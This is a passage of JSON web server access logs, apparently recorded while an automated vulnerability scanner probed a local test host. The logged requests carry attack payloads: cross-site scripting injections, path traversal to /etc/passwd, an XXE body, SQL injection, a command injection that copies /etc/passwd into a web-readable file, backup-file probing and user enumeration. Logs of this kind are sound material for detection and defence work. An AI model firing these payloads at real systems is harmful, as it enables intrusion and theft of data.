AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/29KBxbe9ITRyPtuc4Pkvc2FWKFT/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.141","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.134","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.130","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hedwig.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.131","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.131","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.125","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.124","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.116","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.113","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.104","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.108","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.102","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.102","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.102","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.106","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 